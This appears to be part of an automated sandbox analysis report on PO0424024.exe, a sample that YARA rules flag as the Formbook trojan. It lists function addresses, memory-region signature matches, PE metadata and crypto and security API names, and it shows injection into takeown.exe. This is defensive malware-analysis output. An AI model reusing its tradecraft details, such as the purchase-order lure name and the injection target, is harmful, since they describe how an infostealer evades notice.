Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00401280	2_2_00401280
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00403388	2_2_00403388
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00403390	2_2_00403390
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00401570	2_2_00401570
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_0040FDAA	2_2_0040FDAA
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_0040FDB3	2_2_0040FDB3
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00402640	2_2_00402640
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_0042D653	2_2_0042D653
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00416703	2_2_00416703
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_0040FFD3	2_2_0040FFD3
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_0100A118	2_2_0100A118
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F770C0	2_2_00F770C0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_0103B16B	2_2_0103B16B
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_010301AA	2_2_010301AA
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_010281CC	2_2_010281CC
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F7B1B0	2_2_00F7B1B0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F5F172	2_2_00F5F172
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FA516C	2_2_00FA516C
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_0101F0CC	2_2_0101F0CC
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_0102F0E0	2_2_0102F0E0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_010270E9	2_2_010270E9
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F60100	2_2_00F60100
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F8D2F0	2_2_00F8D2F0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_0102132D	2_2_0102132D
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F8B2C0	2_2_00F8B2C0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_0102A352	2_2_0102A352
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F752A0	2_2_00F752A0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_010303E6	2_2_010303E6
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F7E3F0	2_2_00F7E3F0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FB739A	2_2_00FB739A
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_01010274	2_2_01010274
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F5D34C	2_2_00F5D34C
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_010112ED	2_2_010112ED
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_01027571	2_2_01027571
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_01030591	2_2_01030591
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F61460	2_2_00F61460
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_0100D5B0	2_2_0100D5B0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_0102F43F	2_2_0102F43F
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_01022446	2_2_01022446
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F70535	2_2_00F70535
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_0101E4F6	2_2_0101E4F6
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F8C6E0	2_2_00F8C6E0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_0102F7B0	2_2_0102F7B0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F6C7C0	2_2_00F6C7C0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F70770	2_2_00F70770
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F94750	2_2_00F94750
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_010216CC	2_2_010216CC
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F9E8F0	2_2_00F9E8F0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F738E0	2_2_00F738E0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F568B8	2_2_00F568B8
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_0103A9A6	2_2_0103A9A6
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F72840	2_2_00F72840
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F7A840	2_2_00F7A840
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FDD800	2_2_00FDD800
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F729A0	2_2_00F729A0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F86962	2_2_00F86962
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F79950	2_2_00F79950
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F8B950	2_2_00F8B950
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_0102AB40	2_2_0102AB40
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FB5AA0	2_2_00FB5AA0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_0102FB76	2_2_0102FB76
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F6EA80	2_2_00F6EA80
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FE3A6C	2_2_00FE3A6C
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_01026BD7	2_2_01026BD7
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FADBF9	2_2_00FADBF9
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_01027A46	2_2_01027A46
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_0102FA49	2_2_0102FA49
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F8FB80	2_2_00F8FB80
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_0100DAAC	2_2_0100DAAC
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_0101DAC6	2_2_0101DAC6
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F60CF2	2_2_00F60CF2
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_01021D5A	2_2_01021D5A
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_01027D73	2_2_01027D73
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FE9C32	2_2_00FE9C32
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F70C00	2_2_00F70C00
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F6ADE0	2_2_00F6ADE0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F8FDC0	2_2_00F8FDC0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F88DBF	2_2_00F88DBF
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_01010CB5	2_2_01010CB5
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F73D40	2_2_00F73D40
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_0102FCF2	2_2_0102FCF2
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F7AD00	2_2_00F7AD00
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_0102FF09	2_2_0102FF09
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F79EB0	2_2_00F79EB0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F82E90	2_2_00F82E90
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F70E59	2_2_00F70E59
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_0102FFB1	2_2_0102FFB1
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_0102EE26	2_2_0102EE26
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F62FC8	2_2_00F62FC8
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F71F92	2_2_00F71F92
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_0102CE93	2_2_0102CE93
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FE4F40	2_2_00FE4F40
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F90F30	2_2_00F90F30
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FB2F28	2_2_00FB2F28
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_0102EEDB	2_2_0102EEDB
Source: C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe	Code function: 6_2_086A6AF3	6_2_086A6AF3
Source: C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe	Code function: 6_2_086A1CE3	6_2_086A1CE3
Source: C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe	Code function: 6_2_086A1CDA	6_2_086A1CDA
Source: C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe	Code function: 6_2_086BF583	6_2_086BF583
Source: C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe	Code function: 6_2_086A8633	6_2_086A8633
Source: C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe	Code function: 6_2_0869FF7A	6_2_0869FF7A
Source: C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe	Code function: 6_2_086A1F03	6_2_086A1F03
Source: C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe	Code function: 6_2_0869FF83	6_2_0869FF83
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_038103E6	7_2_038103E6
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_0375E3F0	7_2_0375E3F0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_0380A352	7_2_0380A352
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_037F0274	7_2_037F0274
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_037D02C0	7_2_037D02C0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_037D8158	7_2_037D8158
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_038101AA	7_2_038101AA
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_038081CC	7_2_038081CC
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_037EA118	7_2_037EA118
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_03740100	7_2_03740100
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_037E2000	7_2_037E2000
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_03750770	7_2_03750770
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_03774750	7_2_03774750
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_0374C7C0	7_2_0374C7C0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_0376C6E0	7_2_0376C6E0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_03810591	7_2_03810591
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_03750535	7_2_03750535
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_037FE4F6	7_2_037FE4F6
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_03802446	7_2_03802446
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_03806BD7	7_2_03806BD7
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_0380AB40	7_2_0380AB40
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_0374EA80	7_2_0374EA80
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_03766962	7_2_03766962
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_0381A9A6	7_2_0381A9A6
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_037529A0	7_2_037529A0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_03752840	7_2_03752840
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_0375A840	7_2_0375A840
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_0377E8F0	7_2_0377E8F0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_037368B8	7_2_037368B8
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_037C4F40	7_2_037C4F40
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_03770F30	7_2_03770F30
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_03792F28	7_2_03792F28
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_03742FC8	7_2_03742FC8
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_037CEFA0	7_2_037CEFA0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_0380CE93	7_2_0380CE93
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_03750E59	7_2_03750E59
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_0380EEDB	7_2_0380EEDB
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_0380EE26	7_2_0380EE26
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_03762E90	7_2_03762E90
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_037ECD1F	7_2_037ECD1F
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_0375AD00	7_2_0375AD00
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_0374ADE0	7_2_0374ADE0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_03768DBF	7_2_03768DBF
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_03750C00	7_2_03750C00
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_03740CF2	7_2_03740CF2
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_037F0CB5	7_2_037F0CB5
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_0373D34C	7_2_0373D34C
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_0380132D	7_2_0380132D
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_0379739A	7_2_0379739A
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_0376D2F0	7_2_0376D2F0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_037F12ED	7_2_037F12ED
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_0376B2C0	7_2_0376B2C0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_037552A0	7_2_037552A0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_0373F172	7_2_0373F172
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_0378516C	7_2_0378516C
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_0375B1B0	7_2_0375B1B0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_0381B16B	7_2_0381B16B
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_0380F0E0	7_2_0380F0E0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_038070E9	7_2_038070E9
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_037FF0CC	7_2_037FF0CC
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_037570C0	7_2_037570C0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_0380F7B0	7_2_0380F7B0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_038016CC	7_2_038016CC
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_037ED5B0	7_2_037ED5B0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_03807571	7_2_03807571
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_03741460	7_2_03741460
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_0380F43F	7_2_0380F43F
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_0378DBF9	7_2_0378DBF9
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_037C5BF0	7_2_037C5BF0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_0380FB76	7_2_0380FB76
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_0376FB80	7_2_0376FB80
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_037C3A6C	7_2_037C3A6C
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_037FDAC6	7_2_037FDAC6
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_03807A46	7_2_03807A46
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_0380FA49	7_2_0380FA49
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_037EDAAC	7_2_037EDAAC
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_03795AA0	7_2_03795AA0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_03759950	7_2_03759950
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_0376B950	7_2_0376B950
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_037E5910	7_2_037E5910
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_037BD800	7_2_037BD800
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_037538E0	7_2_037538E0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_0380FFB1	7_2_0380FFB1
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_0380FF09	7_2_0380FF09
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_03713FD2	7_2_03713FD2
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_03713FD5	7_2_03713FD5
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_03751F92	7_2_03751F92
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_03759EB0	7_2_03759EB0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_03753D40	7_2_03753D40
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_0376FDC0	7_2_0376FDC0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_03801D5A	7_2_03801D5A
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_03807D73	7_2_03807D73
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_037C9C32	7_2_037C9C32
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_0380FCF2	7_2_0380FCF2
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_02F115B0	7_2_02F115B0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_02F130F0	7_2_02F130F0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_02F2A040	7_2_02F2A040
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_02F0C7A0	7_2_02F0C7A0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_02F0C797	7_2_02F0C797
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_02F0AA40	7_2_02F0AA40
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_02F0AA37	7_2_02F0AA37
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_02F0C9C0	7_2_02F0C9C0

Source: C:\Windows\SysWOW64\takeown.exe	Code function: String function: 03785130 appears 58 times
Source: C:\Windows\SysWOW64\takeown.exe	Code function: String function: 0373B970 appears 257 times
Source: C:\Windows\SysWOW64\takeown.exe	Code function: String function: 037BEA12 appears 86 times
Source: C:\Windows\SysWOW64\takeown.exe	Code function: String function: 03797E54 appears 98 times
Source: C:\Windows\SysWOW64\takeown.exe	Code function: String function: 037CF290 appears 103 times
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: String function: 00FB7E54 appears 86 times
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: String function: 00F5B970 appears 250 times
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: String function: 00FA5130 appears 36 times
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: String function: 00FEF290 appears 103 times
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: String function: 00FDEA12 appears 85 times

Source: PO0424024.exe

Static PE information: invalid certificate

Source: PO0424024.exe, 00000000.00000002.1731456732.00000000046F0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs PO0424024.exe
Source: PO0424024.exe, 00000000.00000002.1727453508.00000000009FE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs PO0424024.exe
Source: PO0424024.exe, 00000002.00000002.2172803570.000000000105D000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs PO0424024.exe
Source: PO0424024.exe, 00000002.00000002.2172583060.0000000000AD7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenametakeown.exej% vs PO0424024.exe
Source: PO0424024.exe	Binary or memory string: OriginalFilenamevgSP.exeX vs PO0424024.exe

Source: PO0424024.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 2.2.PO0424024.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.PO0424024.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.4170807354.00000000034D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2174491857.00000000012C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.4170764124.0000000003490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.4157652949.0000000002F00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.4176035041.0000000008660000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2172226006.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2174679636.0000000001470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.4170805786.0000000002800000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: PO0424024.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.PO0424024.exe.6e70000.10.raw.unpack, V4uC3Iifq56IKQcfry.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.PO0424024.exe.6e70000.10.raw.unpack, V4uC3Iifq56IKQcfry.cs	Cryptographic APIs: 'CreateDecryptor'

Source: 0.2.PO0424024.exe.46f0000.9.raw.unpack, lXG347jmgqtSJbUTFQ.cs	Security API names: _0020.SetAccessControl
Source: 0.2.PO0424024.exe.46f0000.9.raw.unpack, lXG347jmgqtSJbUTFQ.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.PO0424024.exe.46f0000.9.raw.unpack, lXG347jmgqtSJbUTFQ.cs	Security API names: _0020.AddAccessRule
